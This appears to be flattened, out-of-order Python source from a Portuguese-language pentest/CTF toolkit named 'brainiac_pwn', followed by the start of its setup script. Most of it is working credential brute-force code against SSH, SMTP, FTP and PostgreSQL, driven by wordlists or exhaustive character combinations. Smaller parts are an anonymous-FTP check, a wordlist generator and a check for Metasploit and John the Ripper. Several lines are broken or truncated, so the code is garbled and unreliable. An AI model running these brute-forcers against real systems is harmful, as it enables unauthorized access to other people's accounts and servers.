def escrever_encode16(arquivo,escrever): with open(arquivo,"w") as ll: encode = b16encode(bytes(escrever, 'utf-8')) decode = str(encode)[2:-1] ll.write(decode) Debug.CRITICAL("brainiac_arquivo: " + arquivo) Debug.CRITICAL("escrita " + decode)
def escrever_encode64(arquivo,escrever): with open(arquivo,"w") as ll: encode = b64encode(bytes(escrever, 'utf-8')) decode = str(encode)[2:-1] ll.write(decode) Debug.INFO("Arquivo: " + arquivo) Debug.CRITICAL("escrita " + decode)
def smtp_brute_file(hostname, mail, port, filebr, verbose=""): with open(filebr, "r") as fl: for passw in fl: try: server_ssl = smtplib.SMTP_SSL(hostname, port=port) server_ssl.ehlo() server_ssl.login(mail, passw) Debug.INFO("sucesso => %s %s" % (mail, passw)) except smtplib.SMTPException: Debug.ERRO("%s %s" % (mail, passw))
def check_anonymous_login(hostname): try: ftp = FTP(hostname) ftp.login() Debug.CRITICAL("[+]Anonymous => [ok]") Debug.CRITICAL("[+]Username => [anonymous]") Debug.CRITICAL("[+]Pass => [anonymous]") ftp.quit() except: Debug.AVISO("[+]Anonymous off") pass
def ftp_brute_file(hostname, user, filebr, verbose=""): with open(filebr, "r") as fl: for passw in fl: try: FTP(hostname, user, passw) except ftplib.all_errors: Debug.ERRO("[+]senha errada => %s" % passw)
def check_gcc_version(): gcc1 = platform.python_compiler()[4] gcc2 = platform.python_compiler()[5] gcc3 = platform.python_compiler()[6] gcc4 = platform.python_compiler()[7] gcc5 = platform.python_compiler()[8] version = str(gcc1 + gcc2 + gcc3 + gcc4 + gcc5) Debug.INFO("[+]gcc "+version)
def baixar(url, saida=""): if url == None: print("[+]erro não pode ser um argumento vazio") pass elif saida == None: print("local padrão [/tmp]") try: local = "/tmp" arquivo =, out=local) Debug.AVISO("Diretório => [" + local + "]") Debug.AVISO("Arquivo => [" + arquivo + "]") except Exception: pass else: local = saida arquivo =, out=local) Debug.AVISO("Diretório => [" + local + "]") Debug.AVISO("Arquivo => [" + arquivo + "]")
def xor_bytes(b, key): if len(b) != len(key): Debug.INFO("len(a) != len(b)") if len(b) > len(key): return Convert.str_para_hex("".join( [chr(x ^ y) for (x, y) in zip(b[:len(key)], key)])) else: return Convert.str_para_hex("".join( [chr(x ^ y) for (x, y) in zip(b, key[:len(b)])]))
def check_python_version(): a = sys.version[0] b = sys.version[1] c = sys.version[2] t = a+b+c if t == "3.6": Debug.INFO("[+]python 3.6") else: exit(1)
def ssh_brute_file(hostname, user, filebr): with open(filebr, "r") as fl: for passw in fl: try: s = paramiko.SSHClient() s.set_missing_host_key_policy(paramiko.AutoAddPolicy()) s.load_system_host_keys() s.connect(hostname=hostname, username=user, password=passw) Debug.AVISO("[+] Success! %s => %s" % (user, passw)) break except socket.gaierror: Debug.ERRO("[+]HOST INVALIDO") break except paramiko.AuthenticationException: Debug.ERRO("[-] falha:%s => %s" % (user, passw)) except paramiko.ssh_exception.SSHException: Debug.ERRO("[+]SSHException") pass
def check_programas(): list_cmd = ['msfconsole','john','johnny','iptables'] for cmd in list_cmd: exist ='command -v ' + cmd + '>> /dev/null', shell=True) if exist == 0: pass else: print("Efetue a instalação do [%s]"%cmd) exit(1) Debug.INFO("[+]check programas =>[ok]")
def ssh_brute_char(hostname, user, minimo="", maximo="", char="", verbose=""): min = minimo max = maximo chrs = char min_length, max_length = int(min), int(max) for n in range(min_length, max_length + 1): for xs in itertools.product(chrs, repeat=n): if verbose == True: passw = ''.join(xs) try: s = paramiko.SSHClient() s.set_missing_host_key_policy(paramiko.AutoAddPolicy()) s.load_system_host_keys() s.connect(hostname=hostname, username=user, password=passw) Debug.AVISO("[+] Success! %s => %s" % (user, passw)) break except socket.gaierror: Debug.ERRO("[+]HOST INVALIDO") break except paramiko.AuthenticationException: Debug.ERRO("[-] falha:%s => %s" % (user, passw)) except paramiko.ssh_exception.SSHException: Debug.ERRO("[+]SSHException") pass else: passw = ''.join(xs) try: s = paramiko.SSHClient() s.set_missing_host_key_policy(paramiko.AutoAddPolicy()) s.load_system_host_keys() s.connect(hostname=hostname, username=user, password=passw) Debug.AVISO("[+] Success! %s => %s" % (user, passw)) break except socket.gaierror: Debug.ERRO("[+]HOST INVALIDO") break except paramiko.AuthenticationException: Debug.ERRO("[-] falha:%s => %s" % (user, passw)) except paramiko.ssh_exception.SSHException: Debug.ERRO("[+]SSHException") pass
def smtp_brute_char(hostname, mail, port, minimo, maximo, char, verbose=""): min = minimo max = maximo chrs = char min_length, max_length = int(min), int(max) for n in range(min_length, max_length + 1): for xs in itertools.product(chrs, repeat=n): if verbose == True: passw = ''.join(xs) try: server_ssl = smtplib.SMTP_SSL(hostname, port=port) server_ssl.ehlo() server_ssl.login(mail, passw) Debug.INFO("sucesso => %s %s" % (mail, passw)) except smtplib.SMTPException: Debug.ERRO("%s %s" % (mail, passw))
def ftp_brute_char(hostname, user, minimo, maximo, char, verbose=""): min = minimo max = maximo chrs = char min_length, max_length = int(min), int(max) for n in range(min_length, max_length + 1): for xs in itertools.product(chrs, repeat=n): if verbose == True: passw = ''.join(xs) try: FTP(hostname, user, passw) except ftplib.all_errors: Debug.ERRO("[+]senha errada => %s" % passw)
def postgresql_brute(dbname, user, host, minimo, maximo, char, verbose=""): min = minimo max = maximo chrs = char min_length, max_length = int(min), int(max) for n in range(min_length, max_length + 1): for xs in itertools.product(chrs, repeat=n): if verbose == True: passw = ''.join(xs) try: conn = psycopg2.connect(dbname=dbname, user=user, host=host, password=passw) print(passw) except psycopg2.OperationalError as e: Debug.ERRO("database => db[%s] pass[%s]" % (dbname, passw))
def Gera(minimo,maximo,char,nome,verbose=""): #validacao if minimo == 0: print("[erro]=[numero maior que zero ou nada]") pass exit() if maximo == 0: print("[erro]=[numero maior que zero ou nada]") pass exit() elif type(maximo) == "str": print("[erro]=[]") pass exit() elif type(char) == "init": print("[erro]=[]") pass exit() elif type(nome) == "int": print("[erro]=[]") exit() pass elif type(minimo) == "str": print("[erro]=[]") exit() word_list_name = nome min = minimo max = maximo chrs = char with open(word_list_name, "w") as fl: min_length, max_length = int(min), int(max) for n in range(min_length, max_length + 1): for xs in itertools.product(chrs, repeat=n): dsa = fl.write(''.join(xs) + "\n") if verbose == True: Debug.INFO(''.join(xs)) else: pass
def check_id(): if os.getuid() != 0: Debug.CRITICAL("[+]rode como root") Debug.CRITICAL("sudo python") Debug.CRITICAL("import brainiac") exit(1)
def escrever(arquivo,escrever): with open(arquivo,"w") as ll: ll.write(escrever) Debug.CRITICAL("brainiac_arquivo: " + arquivo) Debug.CRITICAL("escrita")
def is_connected(): try: socket.create_connection(("", 80)) Debug.INFO("[+]Brainiac_Online") except OSError: Debug.INFO("[+]Brainiac_off")
def ipe(): a = ipgetter.myip() Debug.INFO("[+]ip_interno "+a)
def ipi(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("", 80)) a = s.getsockname()[0] Debug.INFO("[+]ip_interno " + a)
if exist == 0: pass else: print("Efetue a instalação do [%s]"%cmd) exit(1) Debug.INFO("[+]check programas =>[ok]") def check_fil(): if os.path.exists("brainiac_suport_file") == True: pass else: os.system("python") if not platform.architecture()[0].startswith('64'): """Determina se o interpretador atual do Python é suportado pelo Brainiac""" Debug.CRITICAL("[+]Brainiac não suporta o usod do Python 32 bits. Use uma versão de 64 bits.") exit(1) else: check_brainiac.check_id() Cores.cores("vermelho","[+]brainiac importado") checkvm = Cores.cores("azul",input("ctf_local ou ctf_online ? [ctf_local/ctf_online] =>")) if checkvm == "ctf_local": check_brainiac.check_vm() elif checkvm == "ctf_online": check_brainiac.check_files_() else: print("[+]modo padrao ctf_online") Cores.cores("amarelo","[+]use help() para ter mais informações") Cores.cores("vermelho","###############################") Cores.cores("azul","[+]Iniciando Checking")
#by:darkcode0x00 from setuptools import setup, find_packages from distutils.core import setup from brainiac_libs.brainiac_cores.cores import Cores from brainiac_libs.brainiac_debug.debug import Debug import platform from distutils.command.install import INSTALL_SCHEMES from distutils.sysconfig import get_python_inc from distutils.util import convert_path import os from os import getuid if getuid() != 0: Debug.CRITICAL("rode como root") Debug.AVISO("sudo python install") exit(1) dist = ["debian","ubuntu","arch"]#linux for i in dist: if i == platform.dist()[0]: Cores.cores("vermelho","=> [%s]"%i) PythonH = os.path.join(get_python_inc(), 'Python.h') if not os.path.exists(PythonH): print(sys.stderr,"You must install the Python development headers!") print(sys.stderr,"$ apt-get install python-dev") sys.exit(-1) setup( name = 'brainiac_pwn', packages=find_packages(), install_requires=[ 'beautifulsoup4', 'requests', 'filemagic',